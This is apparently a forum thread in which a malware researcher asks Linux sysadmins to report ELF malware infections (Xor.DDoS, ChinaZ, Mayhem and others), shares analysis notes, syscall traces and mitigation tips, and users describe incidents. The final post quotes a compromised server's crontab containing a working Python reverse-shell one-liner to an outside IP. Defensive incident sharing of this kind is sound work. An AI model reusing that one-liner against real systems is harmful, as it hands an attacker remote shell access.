If you infected by any of these recent ELF malware cases please contact us?
 

This is not a spam post, a serious question. We found these five Linux malware is active in infection in the past 2 weeks.

ChinaZ http://blog.malwaremustdie.org/2015/...-reloaded.html

Xor.DDoS http://blog.malwaremustdie.org/2015/...ection_23.html

DES.Downloader http://blog.malwaremustdie.org/2015/...5-new-elf.html

.IptabLes|x http://blog.malwaremustdie.org/2015/...tables-on.html

Mayhem http://www.kernelmode.info/forum/vie...tart=10#p26116

I am sure fellow server's sysadmins know a bit about these malware, if you happen to have infection incident, please comment to the above posts by sharing the infection details with us to handle in IR basis?

Sample can be uploaded in mediadire. You can also reach our team in @malwaremustdie (twitter)

Thank you very much

unixfreaxjp

could you please explain a little more what you are refering to?
i don't want to click any random blogpost.

These aren't "random web log posts" and if you have any interest in practical security these are worth reading.

I'd have been too skerd to click on them too. Hard to get search results from my known web pages on the topic.

I read MMD on a regular occasion and I have nothing but Respect for it.

I've been working in NIX OS for 21 years now. I started MMD to fight malware of all kind, but I did not see ELF malware was handled as fairly the same as the windows ones, in generally speaking.
I know how it feel to be sysadmin since I've been one of you in the field, and I know how bad an ELF malware can ruin our week days or week ends too. I know how tight the budget is, and I also know how costly the protection for server side if we consider to buy one..yet the information are so limited.

So I dedicated the most of time on ELF recently until the overall mitigation scheme works better.

The links I posted up there are recent cases of report, an analysis, the attack source recently are mostly China, except Linux/Mayhem is Ukraine basis.

I saw the infection source or malware web panel and surprised to the huge numbers of downloads, specially the ones who rides on shellshock infection scheme < this vulnerability really kicks. Also the Elasticsearch exploit and of course the weak ssh force entries.

So I just think maybe there are more admins hit, this is why I asked. You can click on every link I posted safely, I mean no harm. If you can comment with your cases it will be so wonderful.
We NEED more ways to mitigate the infection like setting some directories under specific permission, harden the SE Linux for some points, mdsumchecks regularly for new changes in files, and so on.

Come on, friends, can not fight these alone, let's fight these bad stuff together.

MalwareMustDie

Come on guys be smart, the people of malwaremustdie are great , they only want a must secure linux , and stop china malware , i always read his blog. Im a sysadmin at mexico , we have some apps living at racksapce cloud , o. January we notice some strange binary an ips conections to china, finally we discover that somebody infect us with an elf using a struts vulnerability on our jboss app. This is the screenshot of virustotal analisys: https://twitter.com/daniel_sal/statu...450181632?s=09

RHEL 6.5

Hope help.

There is a good repository for Linux sysadmin to identify an ELF malware.
It is a perfectly safe site, KernelMode is a community of malware researcher. I am a contributor for the repository too, together with the well-known malware researchers.

You can browse to these ELF topics shown in the link, freely, and read the information to what malware hit you, and some posts have good mitigation hints too, but you will need to subscribe for getting the samples.

Link: http://www.kernelmode.info/forum/vie...hp?f=16&t=3471

thanks to op & everyone for adding more info on this.

i think it's good forum netiquette to post more than just links to other webpages.
i hadn't come across malwaremustdie before.
i have now.

There is a new type of ELF malware, the backdoor DDoS type that is merging the function of Linux/Elknot (ref: http://www.kernelmode.info/forum/vie...&t=3099#p23858) and Linux/BillGates (ref: http://www.kernelmode.info/forum/vie...hp?f=16&t=3429).

The source of the threat is this AS40676 in Psychz Networks, but it seems like the actor are from People Rep of China.

This malware will drop the intial config in the current directory where it is executed:
readlink("/proc/[PID/exe", "/[PATH]/MALWARE", 1024)
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR)
unlink("/[PATH]/MALWARENAME\\xmit.ini")
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR|O_CREAT|O_TRUNC, 0666)
write(3, "0\r\n192.168.x.xx:192.168.x.xx\r\n10000:60000\r\n\r\n0\r\n0:0:0\r\n", 55)
close(3)

Which contains the grep local ethernet with the range of port to be used for the outbound attack:
00000000 30 0d 0a 31 39 32 2e 31 36 38 2e 37 2e 32 31 3a |0..192.168.x.x:|
00000010 31 39 32 2e 31 36 38 2e 37 2e 32 31 0d 0a 31 30 |192.168.x.xx..10|
00000020 30 30 30 3a 36 30 30 30 30 0d 0a 0d 0a 30 0d 0a |000:60000....0..|
00000030 30 3a 30 3a 30 0d 0a |0:0:0..|

I reversed this malware to find that the code is a bit "raw" and unfinished in some parts, but the main TCP flood and backdoor function looks works. Different compare to the old fashioned previous version that exhaust the system resource this malware runs and only takes about 30 of my CPU usage.

The way to mitigate is to secure the usage of libnss and never open SSH login of root or anyone with the suid 0 or don't run FTP and Web service, or it's components (webapps) that can be gained-privilege to the root. That way the /tmp and current directory of the infection will be the only workplace for such malware to operate and easier to clean and dissect it.

I am sorry to post more link, but if you want to see a boring details is in here: http://blog.malwaremustdie.org/2015/...w-malware.html

Subscribed to thread. MMD Site bookmarked. Being a slow study. It takes me awhile to soak things in.

New series of Linux/XOR.DDOS attack are on our Linux servers, dear admin friends.

It was started from ssh brute attacks from:
Be cautious to brute login like below:
This will lead to the malware attempt to infect as per below real log:
If you want to study the malware you can seek in VirusTotal I uploaded them some, with hashes:
The malware will connect via HTTP to aa.hostasa.org and perform command and control back connect to several IP as per called by their hostnames summarized/recorded below:
Some recent PoC of the backdoor/back connection to those CNCs:
GeoLocation and routing info for those abused nodes used as CNC by malware crooks:
Noted that attackers are putting payload malware in only this IP:
Compared to the previous case of the same actor (threat source) I found that they shifted the CNC IP into:
Reference of this threat:
https://pastebin.com/uT6EhZq0

Reference of this case/actor:
http://blog.malwaremustdie.org/2015/...ection_23.html

Reference of the same malware cases:
http://blog.malwaremustdie.org/2015/...hellshock.html
http://blog.malwaremustdie.org/2014/...new-china.html

Cross checking domain registration is leading to the contact ID below:

I wrote a new ELF malicious activity, for the threat aimed Linux and it is having a polymorphic method during infection.

This is a bit technical but, practically all of the analysis I just wrote was on the bash shell, I jumped to browse it after about to post it. I think is a thorough explanation for combining: reverse engineering, linux kernel debugging and forensics (mostly memory data from /proc) for this simple analysis.

Why I announce it in here too, is because the most sample of this threat (XOR.DDoS) that went to the signature are from the pre-infection and not post-infection, so if you conduct the scanning AFTER you get infected..there is a possibility that you got no detection since the malware self-copied into other size and hash.

Please read, I hope it makes out POSIX based OS saver from these attackers.

http://blog.malwaremustdie.org/2015/...ic-in-elf.html

my server just got hit today


unsure how they gained access the firewall was setup to drop all connections below port 10 000
that are not in my Ip range ...

this was in the crontab

*/1 * * * * root /usr/local/rtm/bin/rtm 35 > /dev/null 2> /dev/null
* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("183.131.83.13",2 810));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

thnkss